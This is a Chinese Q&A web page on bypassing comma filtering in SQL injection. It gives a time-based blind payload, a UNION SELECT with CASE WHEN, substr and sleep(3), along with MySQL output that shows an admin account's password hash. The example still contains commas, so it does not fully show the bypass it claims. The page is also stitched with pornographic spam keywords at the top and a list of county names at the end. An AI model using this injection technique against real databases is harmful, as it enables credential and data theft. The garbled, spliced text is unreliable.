亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

sql注入過濾逗號怎么辦

小新
470
2021-02-01 10:36:29
欄目: 云計算

sql注入過濾逗號怎么辦

sql注入過濾逗號的解決方法:

通過case when then繞過,例如:

mysql> select * from lbcms_admin where adminname like "%a%" union select 1,2,3,4,5,6,7,case when substr(database() from 1 for 1) = 'l' then sleep(3) else 0 end;

+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+

| ID | adminName | adminPassWord | adminLov | adminConfig | adminClass | adminLock | adminDate |

+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+

| 1 | admin | a797ba2993304483f0d180e25d14319a | 520 | | NULL | SgrRUQ | 2010-04-14 00:00:00 |

| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 0 |

+----+-----------+-----------------+----------+-------------+------------+-----------+---------------------+

2 rows in set (3.00 sec)


0
武威市| 腾冲县| 兴国县| 景洪市| 江永县| 南丰县| 大名县| 习水县| 满洲里市| 三穗县| 东乌| 龙江县| 滕州市| 乌什县| 汉沽区| 福鼎市| 黎川县| 阳西县| 桐柏县| 始兴县| 威海市| 胶州市| 西乌珠穆沁旗| 乳源| 灵武市| 平塘县| 东明县| 阜新市| 石楼县| 景洪市| 新沂市| 合水县| 莱芜市| 凤翔县| 苏州市| 轮台县| 睢宁县| 重庆市| 梅河口市| 凤山县| 波密县|